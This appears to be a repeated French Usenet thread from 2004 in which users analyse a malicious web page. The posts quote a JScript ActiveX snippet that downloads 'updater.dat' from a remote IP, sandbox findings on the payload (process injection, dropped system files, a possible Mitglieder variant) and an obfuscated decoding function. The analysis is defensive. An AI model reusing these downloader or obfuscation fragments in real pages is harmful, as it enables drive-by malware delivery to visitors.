var oXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP"); var InetPath="http://XX.XXX.77.145/updater.dat"; oXMLHTTP.Open("GET",InetPath,0); oXMLHTTP.Send(); [...]
Le .dat est reconnu heuristiquement (comme Sandbox:Malware) par Norman. Il est packe' avec UPX. Kaspersky (online) ne le connait pas.
La Sandbox de Norman me dit aussi : - qu'il cree un mutex imain_mutex ; - qu'il s'injecte dans un autre processus via "create remote thread" - qu'il cree les fichiers suivants : . C:WINDOWSSYSTEMrealupd.exe. . C:WINDOWSSYSTEMrealupd32.exe. . C:WINDOWSSYSTEMreal32.exe.
-- Tweakie
-- Posté via http://www.webatou.net/ Usenet dans votre navigateur ! Complaints-To:
var oXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP");
var InetPath="http://XX.XXX.77.145/updater.dat";
oXMLHTTP.Open("GET",InetPath,0);
oXMLHTTP.Send();
[...]
Le .dat est reconnu heuristiquement (comme Sandbox:Malware) par
Norman. Il est packe' avec UPX. Kaspersky (online) ne le connait pas.
La Sandbox de Norman me dit aussi :
- qu'il cree un mutex imain_mutex ;
- qu'il s'injecte dans un autre processus via "create remote thread"
- qu'il cree les fichiers suivants :
. C:WINDOWSSYSTEMrealupd.exe.
. C:WINDOWSSYSTEMrealupd32.exe.
. C:WINDOWSSYSTEMreal32.exe.
--
Tweakie
--
Posté via http://www.webatou.net/
Usenet dans votre navigateur !
Complaints-To: abuse@webatou.net
var oXMLHTTP = new ActiveXObject("Microsoft.XMLHTTP"); var InetPath="http://XX.XXX.77.145/updater.dat"; oXMLHTTP.Open("GET",InetPath,0); oXMLHTTP.Send(); [...]
Le .dat est reconnu heuristiquement (comme Sandbox:Malware) par Norman. Il est packe' avec UPX. Kaspersky (online) ne le connait pas.
La Sandbox de Norman me dit aussi : - qu'il cree un mutex imain_mutex ; - qu'il s'injecte dans un autre processus via "create remote thread" - qu'il cree les fichiers suivants : . C:WINDOWSSYSTEMrealupd.exe. . C:WINDOWSSYSTEMrealupd32.exe. . C:WINDOWSSYSTEMreal32.exe.
-- Tweakie
-- Posté via http://www.webatou.net/ Usenet dans votre navigateur ! Complaints-To:
NO_eikaewt_SPAM
Tweakie wrote:
. C:WINDOWSSYSTEMrealupd.exe.
Selon Symantec, ca ressemble a une des versions de Mitgleider. Faudra regarder de plus pres.
-- Tweakie
-- Posté via http://www.webatou.net/ Usenet dans votre navigateur ! Complaints-To:
Tweakie wrote:
. C:WINDOWSSYSTEMrealupd.exe.
Selon Symantec, ca ressemble a une des versions de Mitgleider. Faudra
regarder de plus pres.
--
Tweakie
--
Posté via http://www.webatou.net/
Usenet dans votre navigateur !
Complaints-To: abuse@webatou.net
J'ai regardé un peu, et le seul truc suspect est un script JS crypté ici: http: / /66.139.77.145/
C'est juste la déclaration d'une variable et d'une fonction :
============================================================== var codelock_bas='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function codelock_dec(str) { str=str.split('@').join('CAg'); str=str.split('!').join('W5'); str=str.split('*').join('CAgI'); var bt, dt = ''; for(i=0; i>16, (bt & 0xff00) >>8, bt & 0xff); } if(str.charCodeAt(i -2) == 61) { return(dt.substring(0, dt.length -2)); } else if(str.charCodeAt(i -1) == 61) { return(dt.substring(0, dt.length -1)); } else { return(dt) }; } ============================================================== Une fonction de décodage, apparemment ... Mais je n'ai pas trouvé (en cherchant peu) où se faisait les appels à ce code.
Nicob
On Tue, 27 Apr 2004 16:53:18 +0000, joke0 wrote:
J'ai regardé un peu, et le seul truc suspect est un script JS crypté
ici: http: / /66.139.77.145/
C'est juste la déclaration d'une variable et d'une fonction :
============================================================== var codelock_bas='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function codelock_dec(str) {
str=str.split('@').join('CAg');
str=str.split('!').join('W5');
str=str.split('*').join('CAgI');
var bt, dt = '';
for(i=0; i>16, (bt & 0xff00) >>8, bt & 0xff); }
if(str.charCodeAt(i -2) == 61) {
return(dt.substring(0, dt.length -2));
} else if(str.charCodeAt(i -1) == 61) {
return(dt.substring(0, dt.length -1));
} else {
return(dt)
};
}
==============================================================
Une fonction de décodage, apparemment ... Mais je n'ai pas
trouvé (en cherchant peu) où se faisait les appels à ce code.
J'ai regardé un peu, et le seul truc suspect est un script JS crypté ici: http: / /66.139.77.145/
C'est juste la déclaration d'une variable et d'une fonction :
============================================================== var codelock_bas='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
function codelock_dec(str) { str=str.split('@').join('CAg'); str=str.split('!').join('W5'); str=str.split('*').join('CAgI'); var bt, dt = ''; for(i=0; i>16, (bt & 0xff00) >>8, bt & 0xff); } if(str.charCodeAt(i -2) == 61) { return(dt.substring(0, dt.length -2)); } else if(str.charCodeAt(i -1) == 61) { return(dt.substring(0, dt.length -1)); } else { return(dt) }; } ============================================================== Une fonction de décodage, apparemment ... Mais je n'ai pas trouvé (en cherchant peu) où se faisait les appels à ce code.
Nicob
JacK
sur les news: Gégé signalait:
ts a formulé la demande :
"j" == joke0 writes:
j> Si quelqu'un veut regarder ce que ça cache...
J'ai enlevé le plus dangereux (du moins je pense)
C'est gentil, mais quand je clique sur ton message, Norton me dit qu'il détecte Bloodhound.Exploit.6 et m'en bloque l'accès.
C'est pas dangereux pour les lecteurs mals protégés ?
'lut,
Bloodhound.Exploit, c'est la détection générique de Norton : il soupçonne quelque chose mais ne peut mettre un nom dessus ;)
Rien de dangereux dans le post de Joke0 : c'est du txt. -- JacK
sur les news:mesnews.dcf77d44.d0ef2e70.8.10795@spam.non
Gégé <pasdespams@spam.non> signalait:
ts a formulé la demande :
"j" == joke0 <joke0_NOSWEN@tiscali.fr> writes:
j> Si quelqu'un veut regarder ce que ça cache...
J'ai enlevé le plus dangereux (du moins je pense)
C'est gentil, mais quand je clique sur ton message, Norton me dit
qu'il détecte Bloodhound.Exploit.6 et m'en bloque l'accès.
C'est pas dangereux pour les lecteurs mals protégés ?
'lut,
Bloodhound.Exploit, c'est la détection générique de Norton : il soupçonne
quelque chose mais ne peut mettre un nom dessus ;)
Rien de dangereux dans le post de Joke0 : c'est du txt.
--
JacK
